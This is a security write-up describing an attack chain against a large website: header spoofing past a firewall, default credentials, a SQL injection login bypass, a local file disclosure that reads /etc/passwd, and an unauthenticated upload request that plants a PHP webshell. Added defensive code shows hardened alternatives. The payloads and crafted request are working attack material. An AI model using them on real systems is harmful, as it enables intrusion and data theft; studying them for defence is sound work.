IP spoofing FTW

Starting from the bottom

Today I will talk about a really big company with millions of accounts and millions of people visiting it every day!

At first the website looked secure; the most annoying part was that it sat behind Datadome.

With FFUF I usually run my own "config" (exotic User-Agent, special headers, …) and, when I launched it, I discovered that it was not blocked by Datadome and that it also reached extra files I could not access otherwise (403 Forbidden).

After looking into what had happened, I discovered that it was because of the X-Forwarded-For header with 127.0.0.1 as its value.

Thanks to this I was able to fully bypass the firewall and, on top of that, to reach special endpoints such as /server-info and /server-status, among other things (those answered with a 401).

After hammering on this 401 for a while, I finally found out that the extra protection was simply the company name as both user and password…

Gathering intel is the key

I then dug into the information I had found and discovered interesting things:

  • All the admin endpoints
  • The allowed IPs for these

Here is an excerpt of the /server-info output (mod_info dumps the running configuration), which showed me the authorized IPs (obviously I replaced them with dummy IPs):

# Apache 2.2-style mod_access rules: everything is denied, then the listed source ranges are allowed
<Location "/webteam-admin">
	order deny,allow
	deny from all
	allow from 63.45.67.89/30
	allow from 63.78.56.12/29
	allow from 63.34.12.99/30
	allow from 63.67.89.123/29
</Location>
<Location "/webadmin-store">
	order deny,allow
	deny from all
	allow from 63.98.76.54/30
	allow from 63.34.56.200/29
	allow from 63.234.56.23/30
	allow from 63.12.45.67/29
	allow from 63.56.78.34
	allow from 185.34.56.200
	allow from 63.78.56.12/29
</Location>

Going where no-one has ever gone

After adding one of these IPs to my X-Forwarded-For header, I crawled the admin endpoints…
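A caveat worth keeping in mind: Apache's own Allow from compares the address of the TCP peer (REMOTE_ADDR), so a spoofed X-Forwarded-For only defeats rules like the ones above when the server, or a proxy in front of it, rewrites the client address from that header without restricting which peers may set it (mod_remoteip does exactly that when RemoteIPHeader is configured without a RemoteIPInternalProxy or RemoteIPTrustedProxy list). The Python below is an added example of mine, not code from the post or from the target: it puts that naive lookup next to a resolver that only peels hops belonging to a trusted proxy list. The allowlist reuses the dummy ranges from the /server-info dump; the trusted proxy range 203.0.113.0/24 and the client addresses are constructed.

```python
import ipaddress

# Constructed values (assumptions, not from the original post): the allowlist reuses the
# dummy ranges of the /server-info dump, the trusted proxy range is invented.
ADMIN_ALLOWLIST = [ipaddress.ip_network(n, strict=False) for n in (
    "63.45.67.89/30", "63.78.56.12/29", "63.34.12.99/30", "63.67.89.123/29")]
TRUSTED_PROXIES = [ipaddress.ip_network("203.0.113.0/24")]


def in_any(ip, networks):
    """True if ip parses and falls inside one of the networks; garbage is never a match."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in networks)


def naive_client_ip(remote_addr, xff):
    """Vulnerable: the leftmost X-Forwarded-For entry wins, and any client can set it."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr, xff, trusted_proxies):
    """Hardened: walk the chain right-to-left and peel only hops added by our own proxies.

    X-Forwarded-For reads 'client, proxy1, proxy2'; the TCP peer (remote_addr) is the
    last hop. The first hop that is not a trusted proxy is the real client, whatever
    the header claims further to the left.
    """
    hops = [h.strip() for h in xff.split(",") if h.strip()] if xff else []
    current = remote_addr
    for hop in reversed(hops):
        if not in_any(current, trusted_proxies):
            break  # this hop was not appended by a proxy we control: stop trusting the header
        current = hop
    return current


def admin_allowed(remote_addr, xff, hardened=True):
    """Decide access to the admin Location for one request."""
    if hardened:
        ip = client_ip(remote_addr, xff, TRUSTED_PROXIES)
    else:
        ip = naive_client_ip(remote_addr, xff)
    return in_any(ip, ADMIN_ALLOWLIST)


if __name__ == "__main__":
    # Attacker at 198.51.100.7 connecting directly and claiming an allowlisted address.
    print("naive   :", admin_allowed("198.51.100.7", "63.45.67.89", hardened=False))
    print("hardened:", admin_allowed("198.51.100.7", "63.45.67.89"))
    # Same attacker coming through the real proxy, which appended his true address.
    print("via proxy:", admin_allowed("203.0.113.10", "63.45.67.89, 198.51.100.7"))
```

The direct spoof passes the naive check and fails the hardened one; through the real proxy the attacker's own address is the rightmost untrusted hop, so the forged entry to its left is never consulted.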

Not much to see at first sight, except some login/password authentication forms.

Starting with /webteam-admin, I tried a few things and, bingo, there is an SQL injection!
A basic payload like admin'--+- (admin'-- - once URL-decoded) is enough to log me in as admin…
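To see why that payload works, here is an added example of mine (not code from the post or the target) using an in-memory SQLite table with constructed data: the vulnerable login splices the username into the query, so the quote closes the string literal and the comment marker removes the password check, while the safe version binds parameters. SQLite accepts a bare -- comment; in MySQL the marker must be followed by whitespace, which is why the payload carries the trailing +- (a space and a dash once decoded).

```python
import sqlite3


def make_db():
    """Constructed in-memory users table (example data, not from the target).
    Passwords are stored in clear only to keep the example short; real code compares a hash."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """String-built query: user input becomes part of the SQL text."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterised query: the same characters are only ever data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# admin'--+- as it arrives in a form body, after URL decoding ('+' is a space)
PAYLOAD = "admin'-- -"

if __name__ == "__main__":
    db = make_db()
    # query becomes: ... WHERE username='admin'-- -' AND password='wrong'
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))  # admin
    print("safe      :", login_safe(db, PAYLOAD, "wrong"))        # None
```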

I tried the same thing on /webadmin-store, without success.
Running my favourite tool (ffuf) again, I found some JS files.

Digging into them, I found out that PDF files can be retrieved with action=pdf on the endpoint /webadmin-store/pdf.php.

I tried it and, again, there is no check at all that the user is logged in. On top of that, the id parameter has a Local File Disclosure vulnerability that lets me retrieve any file on the server :)

It was possible to use / directly but, in some cases, that character is filtered.
That is why I always say you should first try to download the file you are using (here, pdf.php).
Looking at how the code is written, we could have bypassed a / restriction by using _ instead if necessary:

<?php
// The relevant part of pdf.php: send PDF headers, then read whatever path the client asked for.
header('Content-type: application/pdf');
header('Content-Disposition: inline; filename=doc.pdf');
header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: pre-check=0, post-check=0, max-age=0');
header('Pragma: anytextexeptno-cache', true);
header('Cache-control: private');
header('Expires: 0');
// Every "_" in id becomes "/", and the result is read with no base directory and no
// authentication or allowlist check: id=_etc_passwd returns /etc/passwd.
readfile(str_replace("_", "/", $_REQUEST['id']));
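The following Python is an added example of mine, not code from the post or the target. It mirrors the str_replace line so the _ trick can be seen on real ids, and puts a confined resolver next to it: the id must be a bare .pdf file name, it is joined onto a fixed directory, and the canonical result has to stay inside that directory. The assets directory is an assumed path.

```python
import os
import re

# Assumed storage directory (not from the original post).
ASSETS_DIR = "/var/www/example/assets"

# A bare file name: starts alphanumeric, no path separators, ends in .pdf.
SAFE_ID = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.pdf")


def vulnerable_resolve(file_id):
    """Mirrors readfile(str_replace('_', '/', $_REQUEST['id'])): no base directory, no checks."""
    return file_id.replace("_", "/")


def safe_resolve(file_id, base_dir=ASSETS_DIR):
    """Return the absolute path to serve, or raise ValueError if the id is not a plain
    file name inside base_dir. No character substitution is done at all."""
    if not file_id or not SAFE_ID.fullmatch(file_id):
        raise ValueError("id must be a plain .pdf file name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_id))
    # Belt and braces: even a name that passed the regex must canonicalise inside base
    # (realpath also follows symlinks, so a symlinked file pointing elsewhere is caught).
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the assets directory")
    return target


def is_rejected(file_id):
    """Helper for callers that only want to know whether safe_resolve refuses an id."""
    try:
        safe_resolve(file_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The ids used later in the post, resolved the vulnerable way.
    print(vulnerable_resolve("_etc_passwd"))
    print(vulnerable_resolve("_var_www_redacted_assets_kuromatae-zef48zef4zefvre1.php"))
    # The confined resolver accepts only a plain invoice name.
    print(safe_resolve("doc.pdf"))
    print(is_rejected("_etc_passwd"), is_rejected("../../etc/passwd.pdf"), is_rejected("x.php"))
```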

To the moon

Obviously there is much more to say about this host but, for the pleasure, I will talk a bit more about /webteam-admin, where I got logged in as admin. After that, my Burp gathered many endpoints and JS files.

One of them particularly caught my attention… It was linked to the vulnerability I mentioned earlier (the Local File Disclosure). Often, when you can retrieve invoices, you can also upload them…

So I looked for the request that does it! After crafting it, this is what it looked like:

POST /webadmin-store/pdf.php HTTP/1.1
Host: [redacted]
Content-Type: multipart/form-data; boundary=----48456566655889104878740450005
Content-Length: 962

-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="action"

pdf
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="type"

upload
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="facture"; filename="Kuromatae.pdf"
Content-Type: application/octet-stream

<?php system("id");?>
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="nomfacture"

kuromatae-zef48zef4zefvre1.php
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="lienfacture"

?action=pdf&id=_var_www_redacted_assets_kuromatae-zef48zef4zefvre1.php
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="pathfacture"

/var/www/[redacted]/assets/
-----------------------------48456566655889104878740450005--

As you can see, there are multiple problems with this request:

  • No authentication check
  • The file can be given any name we want, without restriction (nomfacture)
  • It can be written anywhere we like on the server (pathfacture)
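Here is how an added, hardened handler for that request would treat those three points (a Python example of mine, not the site's code; the session shape, the upload directory and the PDF checks are assumptions): the caller must be logged in, the body must look like a PDF and stay under a size cap, and both the stored name and the directory are chosen on the server, so nomfacture, lienfacture and pathfacture are ignored entirely. The request fields are the ones from the capture above.

```python
import os
import secrets

# Assumed: the only directory uploads may ever land in, served without script execution.
UPLOAD_DIR = "/var/www/example/assets/invoices"
MAX_BYTES = 10 * 1024 * 1024


class UploadRejected(Exception):
    pass


def handle_upload(session, form, files):
    """Server-side handling of the 'upload an invoice' request.

    session: dict for the authenticated user (assumed shape: {"user_id": ...}).
    form:    the non-file multipart fields (action, type, nomfacture, lienfacture, pathfacture).
    files:   {"facture": (client_filename, content_bytes)}.
    Returns the server-chosen absolute destination path, or raises UploadRejected.
    """
    # 1. Authentication: the original endpoint had none.
    if not session.get("user_id"):
        raise UploadRejected("login required")
    if form.get("action") != "pdf" or form.get("type") != "upload":
        raise UploadRejected("unexpected action")
    if "facture" not in files:
        raise UploadRejected("missing file")
    client_name, content = files["facture"]

    # 2. Content validation: size cap, PDF magic bytes, and the client extension as a sanity check.
    if len(content) > MAX_BYTES:
        raise UploadRejected("too large")
    if not content.startswith(b"%PDF-"):
        raise UploadRejected("not a PDF")
    if not client_name.lower().endswith(".pdf"):
        raise UploadRejected("unexpected extension")

    # 3. Name and location are decided here; nomfacture and pathfacture are never read.
    stored_name = secrets.token_hex(16) + ".pdf"
    dest = os.path.join(UPLOAD_DIR, stored_name)
    assert os.path.dirname(dest) == UPLOAD_DIR  # can never escape the upload directory
    return dest


def try_upload(session, form, files):
    """(True, destination) on success, (False, reason) when the upload is refused."""
    try:
        return True, handle_upload(session, form, files)
    except UploadRejected as exc:
        return False, str(exc)


# The multipart fields of the captured request, reconstructed as dicts.
ATTACK_FORM = {
    "action": "pdf",
    "type": "upload",
    "nomfacture": "kuromatae-zef48zef4zefvre1.php",
    "lienfacture": "?action=pdf&id=_var_www_redacted_assets_kuromatae-zef48zef4zefvre1.php",
    "pathfacture": "/var/www/[redacted]/assets/",
}
ATTACK_FILES = {"facture": ("Kuromatae.pdf", b'<?php system("id");?>')}
# A constructed benign upload for comparison.
GOOD_FILES = {"facture": ("Kuromatae.pdf", b"%PDF-1.4\n%constructed minimal body\n")}

if __name__ == "__main__":
    print(try_upload({}, ATTACK_FORM, ATTACK_FILES))            # (False, 'login required')
    print(try_upload({"user_id": 7}, ATTACK_FORM, ATTACK_FILES))  # (False, 'not a PDF')
    print(try_upload({"user_id": 7}, ATTACK_FORM, GOOD_FILES))    # (True, '/var/www/example/assets/invoices/<random>.pdf')
```

The magic-byte check stops the raw <?php payload but not a PDF/PHP polyglot, so the random server-side name with a fixed extension and an upload directory without script execution (ideally outside the web root) are the controls that actually matter.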

The end?

I found many other things but I don't think it is useful to list them all here! The goal was to show a nice little chain that, once again, starts from not much (a simple header).


Have a nice day :)
~ Kuromatae